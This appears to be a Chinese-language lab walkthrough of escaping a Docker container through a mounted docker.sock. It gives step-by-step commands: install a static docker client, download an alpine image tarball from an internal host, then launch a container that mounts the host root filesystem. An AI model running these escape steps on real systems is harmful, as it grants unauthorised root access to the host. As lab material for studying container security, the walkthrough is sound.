环境搭建

  • 本地虚拟机ubuntu

  • 拉取镜像启动并挂载docker.sock

docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu

  • 接下来就会碰到报错

root@ubuntu20:/# docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu
Unable to find image 'ubuntu:latest' locally
docker: Error response from daemon: Get "https://registry-1.docker.io/v2/": proxyconnect tcp: dial tcp x.x.x.x:7897: connect: connection refused.
See 'docker run --help'.

  • 配置docker的代理,就可以正常拉取镜像

sudo mkdir -p /etc/systemd/system/docker.service.d

sudo touch /etc/systemd/system/docker.service.d/http-proxy.conf

sudo vim /etc/systemd/system/docker.service.d/http-proxy.conf


[Service]
Environment="HTTP_PROXY=socks5://x.x.x.x:7897" "HTTPS_PROXY=socks5://x.x.x.x:7897" "NO_PROXY=localhost,127.0.0.1,docker-registry.somecorporation.com"


sudo systemctl daemon-reload


sudo systemctl restart docker



systemctl show --property=Environment docker

  • 继续模拟国内环境,运行容器后后关掉代理

容器环境

  • 查看容器id

root@ubuntu20:~# docker ps 
CONTAINER ID   IMAGE     COMMAND       CREATED          STATUS          PORTS     NAMES
a5b4b354102c   ubuntu    "/bin/bash"   22 minutes ago   Up 22 minutes             with_docker_sock

  • 进入容器

docker exec -it a5b4b354102c /bin/bash

逃逸

  • 寻找docker.sock文件

find / -name docker.sock

  • 找到后进行挂载逃逸

  • 没有docker命令,下载docker二进制文件,解压后即可运行

  • 没有下载命令apt update后进行安装apt install curl

curl https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -o /tmp/docker.tgz

  • 为了区分拉一个别的linux进行逃逸,,发现无法拉取镜像

/tmp/docker/docker -H unix:///run/docker.sock run -v /:/mnt -it alpine  sh

导出docker镜像

  • 找一台能正常拉取镜像的服务器

  • 下载镜像并导出

docker pull alpine

docker save -o alpine_latest.tar alpine:latest

导入镜像逃逸

  • 在要逃逸容器内执行

  • 下载制作好的镜像

curl http://192.168.x.x:8000/alpine_latest.tar -o /tmp/alpine_latest.tar
/tmp/docker/docker load -i /tmp/alpine_latest.tar 
/tmp/docker/docker -H unix:///run/docker.sock run -v /:/mnt -it alpine  sh

  • 成功逃逸